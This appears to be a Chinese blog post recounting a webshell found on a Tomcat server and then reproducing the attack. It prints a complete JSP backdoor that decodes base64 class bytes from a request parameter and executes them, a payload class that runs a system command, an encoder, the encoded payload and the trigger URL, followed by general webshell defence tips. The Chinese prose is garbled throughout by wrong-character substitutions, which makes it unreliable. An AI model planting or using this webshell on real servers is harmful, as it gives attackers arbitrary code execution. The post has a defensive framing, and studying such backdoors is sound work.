关于java:一次被木马攻击的记录

54次阅读

共计 3877 个字符,预计需要花费 10 分钟才能阅读完成。

形容

最近一个老同学跟我说他部署在阿里云上的零碎,在 tomcat 的目录下呈现了一个 index.jsp 文件,内容大抵如下:

我一看发现这不就是一个木马后门文件吗,只须要通过参数 ejiaogl 传入一个通过 base64 编码的 Class 文件,这样就能够解码而后被类加载器加载,而咱们晓得类被加载的时候是能够执行 static 代码块的,而这个代码块能够任由攻击者来指定要执行的代码,是十分危险的,为了更加形象我特意做了一个模仿攻打。

模仿攻打

筹备木马文件

筹备一个 Tomcat,间接启动即可,默认拜访的是ROOT 目录下的index.jsp,筹备好以上的木马后门文件间接替换,文件如下:

<%!
// 自定义了一个类加载器
class U extends ClassLoader{U(ClassLoader c){super(c);
    }
    
    public Class g(byte[] b) {return this.defineClass(b, 0, b.length);
    }
}
​
public byte[] base64Decoder(String str) throws Exception {
    try {Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        // 这里还做了一个 base64 的兼容解决
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
}
%>
<%
// 接管 base64 编码的字符
String cls = request.getParameter("ejiaogl");
if(cls != null){U u = new U(this.getClass().getClassLoader());
    byte[] b = base64Decoder(cls);
    Class clazz = u.g(b);
    // 这里须要留神一下,ClassLoader 形式并不会执行动态代码块,Class.forName 能够执行动态代码块的
    clazz.newInstance();}
%>
<html>
<body>
<h2>Hello World!</h2>
</body>
</html>

筹备命令类

这里筹备一个简略的命令类,打印日志,同时调用本地的计算器:

import java.io.IOException;
public class Script {
​
    static {
        // 非法操作
        System.out.println("==Illegal operation==");
        try {
            // 关上计算器
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {}}
}

Base64 字符串

须要读取 Class 文件,而后转换成一个 Base64 编码的字符串:

private static byte[] loadBytes(Class<?> cls) throws IOException {String name = cls.getCanonicalName().replaceAll("\.", "/") + ".class";
        InputStream is = ClassLoader.getSystemResourceAsStream(name);
        BufferedInputStream bis = new BufferedInputStream(is);
        try {int length = is.available();
            byte[] bs = new byte[length];
            bis.read(bs);
            return bs;
        } finally {bis.close();
            is.close();}
}
​
// 编码操作
byte[] b = loadBytes(Script.class); 
String base64str = Base64.getEncoder().encodeToString(b);

以上生成的 base64 字符串如下所示:

yv66vgAAADQALgcAAgEABlNjcmlwdAcABAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAAygpVgEABENvZGUJAAkACwcACgEAEGphdmEvbGFuZy9TeXN0ZW0MAAwADQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgADwEAFT09SWxsZWdhbCBvcGVyYXRpb249PQoAEQATBwASAQATamF2YS9pby9QcmludFN0cmVhbQwAFAAVAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAFwAZBwAYAQARamF2YS9sYW5nL1J1bnRpbWUMABoAGwEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsIAB0BAARjYWxjCgAXAB8MACAAIQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsHACMBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQANU3RhY2tNYXBUYWJsZQEABjxpbml0PgoAAwApDAAnAAYBAAR0aGlzAQAITFNjcmlwdDsBAApTb3VyY2VGaWxlAQALU2NyaXB0LmphdmEAIQABAAMAAAAAAAIACAAFAAYAAQAHAAAAVwACAAEAAAAWsgAIEg62ABC4ABYSHLYAHlenAARLsQABAAgAEQAUACIAAwAkAAAAEgAEAAAABgAIAAgAEQAJABUACwAlAAAAAgAAACYAAAAHAAJUBwAiAAABACcABgABAAcAAAAvAAEAAQAAAAUqtwAosQAAAAIAJAAAAAYAAQAAAAMAJQAAAAwAAQAAAAUAKgArAAAAAQAsAAAAAgAt

发送申请

在浏览器中拜访如下地址:

http://localhost:8080/index.jsp?ejiaogl= 以上 base64 字符串

能够发现会生成相应的日志,同时会调用服务器端上的计算器,简略模仿了一次攻打;

Webshell

告警

当然阿里云是给出告警的,告警内容如下所示:

其中提到了 index.jsp 是一个木马文件,同时指定了木马类型为 Webshell;

简介

webshell 就是以 asp、php、jsp 或者 cgi 等网页文件模式存在的一种代码执行环境,次要用于网站治理、服务器治理、权限治理等操作。应用办法简略,只需上传一个代码文件,通过网址拜访,便可进行很多日常操作,极大中央便了使用者对网站和服务器的治理。正因如此,也有小局部人将代码批改后当作后门程序应用,以达到管制网站服务器的目标。

一方面,webshell 被站长经常用于网站治理、服务器治理等等,依据 FSO 权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等;另一方面,被入侵者利用,从而达到管制网站服务器的目标。这些网页脚本常称为 WEB 脚本木马,比拟风行的 asp 或 php 木马,也有基于.NET 的脚本木马与 JSP 脚本木马。国内罕用的 WebShell 有海阳 ASP 木马,Phpspy,c99shell 等。

平安防备

  1. 倡议用户通过 ftp 来上传、保护网页,尽量不装置 asp 的上传程序。
  2. 对 asp 上传程序的调用肯定要进行身份认证,并只容许信赖的人应用上传程序。
  3. asp 程序管理员的用户名和明码要有肯定复杂性,不能过于简略,还要留神定期更换。
  4. 到正规网站下载程序,下载后要对数据库名称和寄存门路进行批改,数据库名称要有肯定复杂性。
  5. 要尽量放弃程序是最新版本。
  6. 不要在网页上加注后盾管理程序登陆页面的链接。
  7. 为避免程序有未知破绽,能够在保护后删除后盾管理程序的登陆页面,下次保护时再通过上传即可。
  8. 要时常备份数据库等重要文件。
  9. 日常要多保护,并留神空间中是否有来历不明的 asp 文件。
  10. 尽量敞开网站搜寻性能,利用内部搜寻工具,以防爆出数据。
  11. 利用白名单上传文件,不在白名单内的一律禁止上传,上传目录权限遵循最小权限准则。

参考

https://baike.baidu.com/item/…

https://www.freebuf.com/artic…

总结

对于一个网站来说安全性其实是最重要的,然而对很多程序员来说往往会漠视这个问题,因为很多公司都有专门的安全部门,很多平安问题其实并不会流转到程序员手中;但我感觉咱们程序员群体还是很有必要去理解一些平安方面的常识,一方面是保障了咱们零碎的安全性,另一方面其实也让咱们对一些知识点了解的更加透彻,往往给你一种“还能够这么玩”的感觉。

正文完
 0